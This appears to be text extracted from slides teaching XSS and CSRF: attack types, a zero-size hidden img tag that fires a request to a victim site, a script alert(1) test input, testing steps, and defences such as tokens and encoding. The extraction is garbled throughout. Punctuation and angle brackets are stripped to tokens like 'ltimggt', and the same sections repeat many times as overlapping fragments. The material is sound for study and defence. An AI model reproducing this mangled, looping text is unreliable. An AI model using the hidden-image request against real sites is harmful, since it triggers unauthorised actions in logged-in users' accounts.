bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy